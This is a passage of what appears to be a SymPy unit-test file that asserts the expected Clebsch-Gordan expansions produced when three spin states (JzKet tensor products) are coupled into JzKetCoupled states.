S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1)),
((1, 3), (1, 2)),
) == JzKetCoupled(
S(5) / 2,
Rational(-5, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
# j1=1, 1, 1
assert couple(
TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2))
) == JzKetCoupled(3, 3, (1, 1, 1), ((1, 3, 2), (1, 2, 3)))
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 5
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2)))
== -sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== -JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- 2 * sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 5
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 5
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2))
) == JzKetCoupled(3, -3, (1, 1, 1), ((1, 3, 2), (1, 2, 3)))
# j1=1/2, j2=1/2, j3=3/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(5, 2),
S(5) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 2
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== 2
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 6
+ 3
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 6
- 3
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== -2
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 2
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(15)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(5, 2),
-S(5) / 2,
